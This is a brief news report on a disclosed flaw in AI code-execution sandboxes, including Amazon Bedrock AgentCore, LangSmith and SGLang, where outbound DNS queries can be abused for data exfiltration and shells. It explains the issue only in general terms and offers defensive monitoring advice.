Cybersecurity researchers have disclosed critical vulnerabilities in major artificial intelligence platforms that enable data exfiltration and remote code execution. The flaws affect Amazon Bedrock AgentCore Code Interpreter, LangSmith, and SGLang, allowing attackers to exploit DNS queries to breach AI code execution environments.

According to BeyondTrust researchers, Amazon Bedrock's sandbox mode permits outbound DNS queries that attackers can manipulate to establish interactive shells and steal sensitive data. The vulnerability represents a significant security gap in AI infrastructure that organizations increasingly rely on for processing sensitive information.

The attack method leverages domain name system queries as a covert channel for data exfiltration from AI environments. By exploiting these DNS-based communication pathways, attackers can bypass traditional security controls and extract information from what should be isolated execution environments.

The research highlights broader security challenges in AI platform architectures, where the need for computational flexibility often conflicts with strict security isolation. Organizations using these platforms should review their AI security postures and implement additional monitoring for unusual DNS activity until patches are deployed.

This disclosure underscores the evolving threat landscape around AI infrastructure, as cybercriminals adapt traditional attack vectors to target the growing ecosystem of AI services and platforms that handle increasingly sensitive corporate and personal data.